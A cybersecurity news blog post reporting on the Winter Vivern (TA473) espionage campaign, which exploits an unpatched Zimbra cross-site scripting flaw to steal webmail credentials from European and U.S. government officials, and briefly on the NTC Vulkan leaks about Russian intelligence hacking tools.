Winter Vivern: The Latest Cyber Threat Targeting European Governments

Reading Time: ( Word Count: )

April 1, 2023
Nextdoorsec-course

Winter Vivern, an advanced persistent threat (APT) actor, has expanded its cyber espionage campaign by targeting officials in Europe and the U.S. This campaign involves leveraging an unpatched Zimbra vulnerability in publicly facing webmail portals, allowing the group to access the email mailboxes of government entities in Europe.

Proofpoint, an enterprise security firm, is tracking the activity under its name, TA473 (UAC-0114). The firm describes TA473 as an adversarial crew whose operations align with Russian and Belarussian geopolitical objectives. 

Despite its lack of sophistication, the group has been linked to recent attacks targeting state authorities of Ukraine and Poland, government officials in India, Lithuania, Slovakia, and even the Vatican.

The group uses scanning tools such as Acunetix to find unpatched webmail portals belonging to targeted companies. They then send phishing emails under the guise of benign government agencies, with messages containing booby-trapped URLs. 

Also Read: “MacStealer Malware Strikes: iCloud Keychain Data and Passwords at Risk for Apple Users.”

Winter Vivern

These URLs manipulate the cross-site scripting (XSS) error in Zimbra to manage custom Base64-encoded JavaScript payloads within victims’ webmail portals, allowing the group to exfiltrate usernames, passwords, and access tokens.

Each JavaScript payload is monitored to the targeted webmail portal, indicating that the group is willing to invest time and resources to decrease the possibility of detection. According to Proofpoint, TA473’s persistent approach to vulnerability scanning and exploitation of unpatched vulnerabilities is a key factor in its success.

These findings coincide with revelations that at least three Russian intelligence agencies (FSB, GRU, and SVR) use software and hacking tools designed by a Moscow-based IT contractor called NTC Vulkan. 

This includes frameworks like Scan, Amesit, and Krystal-2B, which simulate coordinated IO/OT attacks against rail and pipeline control systems.

Mandiant, a threat intelligence firm, notes that contracted projects from NTC Vulkan provide insight into the investment of Russian intelligence services in inventing abilities to deploy more efficient functions within the beginning of the attack lifecycle, a part of procedures often concealed from sight.

Saher Mahmood

Saher Mahmood

Author

Saher is a cybersecurity researcher with a passion for innovative technology and AI. She explores the intersection of AI and cybersecurity to stay ahead of evolving threats.

Other interesting articles

Top 10 Mobile App Penetration Tools and Services of 2024

Top 10 Mobile App Penetration Tools and Services of 2024

In the ever-evolving landscape of mobile applications, security remains a paramount concern. With the surge in the ...
Best Vulnerability Scanning Services of 2024

Best Vulnerability Scanning Services of 2024

In the rapidly evolving digital landscape, cybersecurity is not just a necessity but a critical imperative for ...
The Secrets Behind Email Spoofing vs Phishing Uncovered

The Secrets Behind Email Spoofing vs Phishing Uncovered

In the realm of computer network security, email-based threats have emerged as a significant concern for ...
Experts’ Choice: Top Network Security Tools You Need to Know

Experts’ Choice: Top Network Security Tools You Need to Know

In the ever-evolving landscape of cyber threats, safeguarding the sanctum of computer network security has become ...
0 Comments

Submit a Comment

Your email address will not be published. Required fields are marked *